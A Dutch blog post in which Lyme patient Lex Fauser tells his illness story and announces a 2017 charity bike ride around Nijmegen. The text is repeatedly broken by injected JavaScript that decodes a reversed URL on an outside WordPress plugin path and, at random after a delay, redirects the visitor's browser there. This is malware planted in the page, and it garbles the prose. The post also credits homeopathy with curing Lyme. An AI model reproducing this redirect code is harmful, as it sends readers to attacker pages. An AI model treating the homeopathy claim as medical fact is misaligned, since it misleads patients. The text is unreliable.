Verhalen van lotgenoten Verschillende verhalen

Lymetrial – Lex gaat fietsen voor Lyme

Lex Fauser is 53 jaar en heeft de ziekte van Lyme gehad. Hij heeft ook een ontzettend grote passie voor fietsen. Om die reden gaat hij een Lymetrial fietsen. Om hier meer bekendheid voor te krijgen schreef hij een stukje voor op mijn blog. In dat stuk, wat hieronder te lezen is, vertelt hij meer over zichzelf en zijn Lymetrial.

Het verhaal van Lex

Ik ben Lex Fauser, 53 jaar en woon in Nijmegen. In 2008 heb ik ongemerkt de ziekte van Lyme opgelopen en hierdoor ben ik zeer ernstig ziek geweest. Ik heb bijna alle 50 symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen van de ziekte van Lyme gehad en ik kon niets meer.  Eind 2008 werd ik met spoed 2 dagen opgenomen op de afdeling neurologie van het Radboudumc te Nijmegen. Dit was in verband met onder andere een aangezichtsverlamming. Daar heb ik vele onderzoeken gehad en ook na die opname vele diverse antibiotica kuren moeten slikken. Begin 2009 kreeg ik eindelijk de diagnose: ziekte van Lyme. Het kwartje viel, maar wat nu?! Hoe nu verder?! Al die vele diverse antibiotica kuren hielpen helemaal niks helaas!

Weg naar herstel

Intussen werd ik steeds ernstiger ziek en raakte ik moedeloos. Intussen was het al halverwege 2012, had ik veel last van verschillende symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen. Ik kwam terug bij mijn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toenmalige Lyme specialist in het Radboud UMC. Ik kreeg toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen te horen dat zij niks meer voor mij kon doen. Aangezien ik per se wilde genezen en ik een doordouwer en een “vechter” ben, vroeg ik aan haar of ze open stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond voor alternatieve geneeswijzen. Zij heeft mij toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen doorverwezen naar de alternatieve arts, waar ik nu nog voor controle en behandeling kom. Van half 2012 t/m eind 2013 heeft hij mij behandeld door middel van 2 zware homeopathische kuren. Omdat deze nare ziekte wel 5 jaar in mijn lijf heeft kunnen klieren, heb ik er nog wel klachten aan over gehouden. Maar de meesten kan mijn arts nog verhelpen.  Ik ben hem eeuwig dankbaar!

Vechter

Dankzij hem en ook natuurlijk dankzij mijn geloof in hem en mijn “vechtlust” en wil om te genezen, ben ik zover gekomen als dat ik nu ben! Ik werk nog steeds niet maar sinds februari 2014 voetbal ik in en met een G-team: speciaal voor volwassenen met diverse beperkingen. Fitness ik 1 keer in de 2 weken met behulp van mijn fysiotherapeut. En ik fiets regelmatig.

Lymetrial 

Vanuit mijn grote passie/sport fietsen, kwam ik op het idee om mijn eigen Lymetrial: 82 km rondom Nijmegen om geld te kunnen zamelen voor betere onderzoeken en behandelingen voor Lyme patiënten, te gaan fietsen. Mijn eerste Lymetrial fietste ik op 14-06-2015 met veel plezier en helemaal goed uit! En haalde toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen zo’n dikke 400 euro op voor de Nederlandse Vereniging voor Lyme Patiënten!

Mijn tweede Lymetrial ga ik op zaterdag 5 augustus aanstaande (2017) fietsen! De route is precies hetzelfde als in 2015. Ik start dan op Lage Markt (L) in Nijmegen, rijd dan naar de Yves Montandstraat (de Y) in Lent, dan via Nijmegen, Heumen en Linden naar Mill (M), dan via Grave, Niftrik, Hernen, Winssen, Ewijk, Herveld naar Elst (E), en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot slot om weer thuis te komen via Oosterhout en Lent weer terug naar Lage Markt in Nijmegen.

Zo staat er na het volbrengen van de hele 82 km fietsroute het woord: LYME!

 

Mede-fietsers en sponsors gezocht!

Mede-fieters zijn van harte welkom! Graag zelfs en dit is extra leuk en gezellig! Je kunt mij dan ook sponsoren met mijn Lymetrial door middel van jouw donatie aan de desbetreffende Lyme verenigingen.

Ik hoop dat ik dit jaar weer vele mede-fietsers krijg en dat er veel mensen zijn die mij willen sponsoren hiermee. Dan komt al het binnengekomen geld ten goede aan betere onderzoeken en behandelingen voor alle Lyme patiënten.

Voor alle informatie over en aanmelden voor mijn Lymetrial: LEX FAUSER, tel: 0627423037 en/of E-mailadres: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:lex.fauser@gmail.com” target=”_blank” rel=”noopener”>lex.fauser@gmail.com

Sportieve fietsgroeten,

Lex Fauser.

 

Facebook reacties

Geen reacties

Leave a Reply

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

%d bloggers liken dit: